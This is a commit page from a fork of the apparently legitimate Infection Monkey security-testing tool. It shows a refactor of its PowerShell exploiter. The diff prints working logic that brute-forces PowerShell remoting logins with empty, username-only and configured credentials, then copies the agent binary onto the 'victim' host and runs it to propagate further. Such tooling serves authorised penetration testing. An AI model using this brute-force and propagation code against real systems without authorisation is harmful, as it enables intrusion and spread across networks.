p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Refactored PowerShellExploiter authentication function names

This commit is contained in:
Mike Salvatore 2021-08-24 09:29:02 -04:00
parent e339932fde
commit f1c247ad93
1 changed files with 52 additions and 47 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

99
monkey/infection_monkey/exploit/powershell.py
View File

@ -41,76 +41,61 @@ class PowerShellExploiter(HostExploiter):
logging.getLogger(package.__name__).setLevel(logging.ERROR) logging.getLogger(package.__name__).setLevel(logging.ERROR)
def _exploit_host(self): def _exploit_host(self):
result = self._attempt_exploitations() self.client = self._authenticate_via_brute_force()
if not result: if not self.client:
return False return False
arch = self._get_host_arch() self._execute_monkey_agent_on_victim()
self.is_32bit = arch == WIN_ARCH_32
self._write_virtual_file_to_local_path() def _authenticate_via_brute_force(self) -> typing.Optional[Client]:
self.monkey_path_on_victim = (
self._config.dropper_target_path_win_32
if self.is_32bit
else self._config.dropper_target_path_win_64
)
is_monkey_copy_successful = self._copy_monkey_binary_on_victim()
if is_monkey_copy_successful:
self._execute_monkey_on_victim()
else:
return False
return True
def _attempt_exploitations(self) -> bool:
try: try:
self.client = self._exploit_without_credentials() client = self._authenticate_with_empty_credentials()
return client
except FailedExploitationError: except FailedExploitationError:
LOG.info("Failed exploitation without credentials.") LOG.info("Failed exploitation without credentials.")
try:
self.client = self._exploit_with_usernames_only(
usernames=self._config.exploit_user_list
)
except FailedExploitationError:
LOG.info("Failed exploitation using configured usernames only.")
try:
self.client = self._exploit_with_credentials(
credential_list=self._config.get_exploit_user_password_pairs()
)
except FailedExploitationError:
LOG.info("Failed exploitation using configured credentials. Quitting.")
return False
return True try:
client = self._authenticate_with_empty_passwords(
usernames=self._config.exploit_user_list
)
return client
except FailedExploitationError:
LOG.info("Failed exploitation using configured usernames only.")
def _exploit_without_credentials(self) -> Client: try:
return self._try_exploit() client = self._authenticate_with_usernames_and_passwords(
credential_list=self._config.get_exploit_user_password_pairs()
)
return client
except FailedExploitationError:
LOG.info("Failed exploitation using configured credentials. Quitting.")
def _exploit_with_usernames_only(self, usernames: typing.List[str]) -> Client: return None
def _authenticate_with_empty_credentials(self) -> Client:
return self._authenticate(None, None)
def _authenticate_with_empty_passwords(self, usernames: typing.List[str]) -> Client:
for username in usernames: for username in usernames:
try: try:
client = self._try_exploit(username) client = self._authenticate(username, None)
return client return client
except FailedExploitationError: except FailedExploitationError:
pass pass
raise FailedExploitationError raise FailedExploitationError
def _exploit_with_credentials( def _authenticate_with_usernames_and_passwords(
self, credential_list: typing.List[typing.Tuple[str, str]] self, credential_list: typing.List[typing.Tuple[str, str]]
) -> Client: ) -> Client:
for username, password in credential_list: for username, password in credential_list:
try: try:
client = self._try_exploit(username, password) client = self._authenticate(username, password)
return client return client
except FailedExploitationError: except FailedExploitationError:
pass pass
raise FailedExploitationError raise FailedExploitationError
def _try_exploit( def _authenticate(self, username: str, password: str) -> Client:
self, username: typing.Optional[str] = None, password: typing.Optional[str] = None
) -> Client:
try: try:
with Client( with Client(
self.host.ip_addr, self.host.ip_addr,
@ -124,6 +109,26 @@ class PowerShellExploiter(HostExploiter):
except Exception: except Exception:
raise FailedExploitationError raise FailedExploitationError
def _execute_monkey_agent_on_victim(self):
arch = self._get_host_arch()
self.is_32bit = arch == WIN_ARCH_32
self._write_virtual_file_to_local_path()
self.monkey_path_on_victim = (
self._config.dropper_target_path_win_32
if self.is_32bit
else self._config.dropper_target_path_win_64
)
is_monkey_copy_successful = self._copy_monkey_binary_to_victim()
if is_monkey_copy_successful:
self._run_monkey_executable_on_victim()
else:
return False
return True
def _get_host_arch(self) -> typing.Union[WIN_ARCH_32, WIN_ARCH_64]: def _get_host_arch(self) -> typing.Union[WIN_ARCH_32, WIN_ARCH_64]:
output = self._execute_cmd_on_host(GET_ARCH_WINDOWS) output = self._execute_cmd_on_host(GET_ARCH_WINDOWS)
if "64-bit" in output: if "64-bit" in output:
@ -142,7 +147,7 @@ class PowerShellExploiter(HostExploiter):
with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file: with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
monkey_local_file.write(monkey_virtual_file.read()) monkey_local_file.write(monkey_virtual_file.read())
def _copy_monkey_binary_on_victim(self) -> bool: def _copy_monkey_binary_to_victim(self) -> bool:
try: try:
self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim) self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim)
return True return True
@ -151,7 +156,7 @@ class PowerShellExploiter(HostExploiter):
finally: finally:
os.remove(TEMP_MONKEY_BINARY_FILEPATH) os.remove(TEMP_MONKEY_BINARY_FILEPATH)
def _execute_monkey_on_victim(self) -> None: def _run_monkey_executable_on_victim(self) -> None:
monkey_params = build_monkey_commandline( monkey_params = build_monkey_commandline(
target_host=self.host, target_host=self.host,
depth=get_monkey_depth() - 1, depth=get_monkey_depth() - 1,